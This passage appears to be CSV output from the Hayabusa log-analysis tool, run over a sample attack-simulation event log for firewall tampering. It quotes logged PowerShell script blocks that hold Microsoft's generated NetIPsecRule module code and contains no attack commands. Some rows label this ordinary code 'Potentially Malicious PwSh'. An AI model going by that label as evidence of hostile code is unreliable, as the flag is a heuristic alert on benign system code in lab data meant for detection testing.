$__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') 
-contai",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', 
$__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') 
} if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', 
$__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] 
